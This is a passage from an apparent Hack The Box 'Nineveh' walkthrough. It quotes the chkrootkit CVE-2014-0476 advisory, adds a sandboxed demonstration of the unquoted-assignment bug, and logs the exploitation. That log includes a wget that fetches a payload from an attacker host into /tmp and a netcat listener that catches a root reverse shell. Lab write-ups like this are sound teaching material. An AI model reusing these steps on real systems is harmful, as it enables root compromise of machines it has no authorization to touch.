CVE-2014-0476
This apparently applies to the instance of Chkrootkit running on the target system.
Exploit
┌──(kali㉿kali)-[~/archive/htb/labs/nineveh]
└─$ searchsploit -x linux/local/33899.txt
Exploit: Chkrootkit 0.49 - Local Privilege Escalation
URL: https://www.exploit-db.com/exploits/33899
Path: /usr/share/exploitdb/exploits/linux/local/33899.txt
Codes: CVE-2014-0476, OSVDB-107710
Verified: True
File Type: ASCII text
We just found a serious vulnerability in the chkrootkit package, which
may allow local attackers to gain root access to a box in certain
configurations (/tmp not mounted noexec).
The vulnerability is located in the function slapper() in the
shellscript chkrootkit:
#
# SLAPPER.{A,B,C,D} and the multi-platform variant
#
slapper (){
   SLAPPER_FILES="${ROOTDIR}tmp/.bugtraq ${ROOTDIR}tmp/.bugtraq.c"
   SLAPPER_FILES="$SLAPPER_FILES ${ROOTDIR}tmp/.unlock ${ROOTDIR}tmp/httpd \
   ${ROOTDIR}tmp/update ${ROOTDIR}tmp/.cinik ${ROOTDIR}tmp/.b"a
   SLAPPER_PORT="0.0:2002 |0.0:4156 |0.0:1978 |0.0:1812 |0.0:2015 "
   OPT=-an
   STATUS=0
   file_port=

   if ${netstat} "${OPT}"|${egrep} "^tcp"|${egrep} "${SLAPPER_PORT}"> /dev/null 2>&1
   then
      STATUS=1
      [ "$SYSTEM" = "Linux" ] && file_port=`netstat -p ${OPT} | \
         $egrep ^tcp|$egrep "${SLAPPER_PORT}" | ${awk} '{ print $7 }' |
         tr -d :`
   fi

   for i in ${SLAPPER_FILES}; do
      if [ -f ${i} ]; then
         # unquoted assignment: when $file_port is empty this runs $i
         file_port=$file_port $i
         STATUS=1
      fi
   done

   if [ ${STATUS} -eq 1 ] ;then
      echo "Warning: Possible Slapper Worm installed ($file_port)"
   else
      if [ "${QUIET}" != "t" ]; then echo "not infected"; fi
      return ${NOT_INFECTED}
   fi
}
The line 'file_port=$file_port $i' will execute all files specified in
$SLAPPER_FILES as the user chkrootkit is running (usually root), if
$file_port is empty, because of missing quotation marks around the
variable assignment.
Steps to reproduce:
- Put an executable file named 'update' with non-root owner in /tmp (not
mounted noexec, obviously)
- Run chkrootkit (as uid 0)
Result: The file /tmp/update will be executed as root, thus effectively
rooting your box, if malicious content is placed inside the file.
If an attacker knows you are periodically running chkrootkit (like in
cron.daily) and has write access to /tmp (not mounted noexec), he may
easily take advantage of this.
Suggested fix: Put quotation marks around the assignment.
file_port="$file_port $i"
I will also try to contact upstream, although the latest version of
chkrootkit dates back to 2009 - will have to see if I reach a dev there.
The advisory says that an attacker can gain code execution via Chkrootkit by placing an executable at /tmp/update.
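To see the quoting bug in action next to the suggested fix, here is an added demonstration that is not chkrootkit's or the advisory's code: it runs the slapper() file loop against a throwaway directory instead of /tmp, with a harmless marker script standing in for 'update'. The helper names make_sandbox, scan_slapper and was_executed are my own.

```sh
#!/bin/sh
# Added demonstration of the unquoted assignment in chkrootkit's slapper() loop
# (not chkrootkit's or the advisory's code). It uses a sandbox directory instead
# of /tmp and a marker script instead of a real 'update' file.

# Build the sandbox: a directory containing an executable named 'update' whose
# only action is to drop a MARKER file, so we can tell whether it was run.
make_sandbox() {
    dir=$(mktemp -d "${TMPDIR:-/tmp}/slapper.XXXXXX")
    printf '#!/bin/sh\necho ran > "%s/MARKER"\n' "$dir" > "$dir/update"
    chmod 755 "$dir/update"
    echo "$dir"
}

# The file loop from slapper(), with ROOTDIR pointing at the sandbox.
# $1 = sandbox directory, $2 = "vuln" (original line) or "fixed" (quoted line).
# Prints the final value of file_port, which the real function puts in its warning.
scan_slapper() {
    ROOTDIR="$1/"
    SLAPPER_FILES="${ROOTDIR}.bugtraq ${ROOTDIR}update ${ROOTDIR}.cinik"
    file_port=
    for i in ${SLAPPER_FILES}; do
        if [ -f ${i} ]; then
            if [ "$2" = "vuln" ]; then
                # With file_port empty this is parsed as the command "$i" run
                # with a temporary assignment "file_port=", so the file executes
                # with the scanner's privileges and file_port stays empty.
                file_port=$file_port $i
            else
                # Suggested fix: the quotes make it a plain string assignment.
                file_port="$file_port $i"
            fi
        fi
    done
    echo "$file_port"
}

# Exit status 0 if the sandbox's 'update' was executed (MARKER exists).
was_executed() {
    [ -f "$1/MARKER" ]
}

# Stand-alone run: the original line executes update, the fixed line does not.
d=$(make_sandbox)
scan_slapper "$d" vuln >/dev/null
was_executed "$d" && echo "original line: $d/update was executed"
rm -f "$d/MARKER"
scan_slapper "$d" fixed >/dev/null
was_executed "$d" || echo "fixed line: nothing executed, only the name recorded"
rm -rf "$d"
```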
Privilege Escalation
amrois@nineveh:/report$ cd /tmp
amrois@nineveh:/tmp$ wget http://10.10.14.5:8000/update ; chmod 777 update
--2023-01-16 19:32:09-- http://10.10.14.5:8000/update
Connecting to 10.10.14.5:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 194 [application/octet-stream]
Saving to: ‘update’
update 100%[========================================================================================>] 194 --.-KB/s in 0s
2023-01-16 19:32:09 (57.0 MB/s) - ‘update’ saved [194/194]
I changed the working directory to /tmp, transferred the payload and set its permission bits to 777.
┌──(kali㉿kali)-[~/archive/htb/labs/nineveh]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.43] 35836
whoami
root
hostname
nineveh
ifconfig
ens160    Link encap:Ethernet  HWaddr 00:50:56:b9:17:ee
          inet addr:10.10.10.43  Bcast:10.10.10.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:20763 errors:0 dropped:0 overruns:0 frame:0
          TX packets:42577 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:5312714 (5.3 MB)  TX bytes:6835558 (6.8 MB)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:160 errors:0 dropped:0 overruns:0 frame:0
          TX packets:160 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1
          RX bytes:11840 (11.8 KB)  TX bytes:11840 (11.8 KB)
I got a connection back as root, a system-level compromise.